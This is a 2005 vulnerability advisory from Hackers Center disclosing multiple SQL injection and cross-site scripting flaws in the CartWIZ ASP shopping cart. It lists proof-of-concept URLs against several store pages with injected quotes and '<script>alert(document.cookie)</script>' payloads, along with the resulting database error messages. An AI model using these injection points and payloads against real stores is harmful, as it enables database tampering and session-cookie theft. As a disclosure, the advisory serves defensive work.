|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Saturday, 23 April 2005 20:23 |
 Dcrab "s Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab"s Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple Sql injection and XSS in CartWIZ ASP Cart
Date: 23/04/2005
Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com
Summary: There are, multiple sql injection and xss in cartwiz asp cart.
Proof of Concept Exploits:
http://localhost/cartWiz/store/addToCart.asp?idProduct="SQL_INJECTION&quantity=1
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string "SQL_INJECTION".
/cartWiz/store/addToCart.asp, line 86
http://localhost/cartwiz/store/productDetails.asp?idProduct="SQL%20INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string "SQL INJECTION".
/cartwiz/store/productDetails.asp, line 34
http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo="SQL INJECTION&validate=1
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near "SQL".
/cartwiz/store/searchResults.asp, line 102
http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom="SQL INJECTION&priceTo=9999999999&validate=1
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near "SQL".
/cartwiz/store/searchResults.asp, line 102
http://localhost/cartwiz/store/searchResults.asp?name=&idCategory="SQL INJECTION&sku=&priceFrom=0&priceTo=9999999999&validate=1
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near " or products.briefDescription LIKE ".
/cartwiz/store/searchResults.asp, line 102
http://localhost/cartwiz/store/tellAFriend.asp?idProduct=""><script>alert(document.cookie)</script>
XSS Pops Cookie
http://localhost/cartwiz/store/addToWishlist.asp?idProduct=""><script>alert(document.cookie)</script>
XSS Pops Cookie
http://localhost/cartwiz/store/access.asp?redirect=""><script>alert(document.cookie)</script>
XSS Pops Cookie
http://localhost/cartWiz/store/error.asp?message=""><script>alert(document.cookie)</script>
XSS Pops Cookie
http://localhost/cartwiz/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect=""><script>alert(document.cookie)</script>
XSS Pops Cookie
http://localhost/cartwiz/store/login.asp?message=""><script>alert(document.cookie)</script>&redirect=
XSS Pops Cookie
http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku="%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&priceFrom=0&priceTo=9999999999&validate=1
XSS Pops Cookie
http://localhost/cartwiz/store/searchResults.asp?name=""><script>alert(document.cookie)</script>&idCategory=&sku=&priceFrom=0&priceTo=9999999999&validate=1
XSS Pops Cookie
http://localhost/cartwiz/store/productCatalogSubCats.asp?idParentCategory="SQL ERROR
SQL ERROR
Microsoft VBScript runtime error "800a000d"
Type mismatch: "[string: ""SQL ERROR"]"
/cartwiz/store/productCatalogSubCats.asp, line 87
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
|
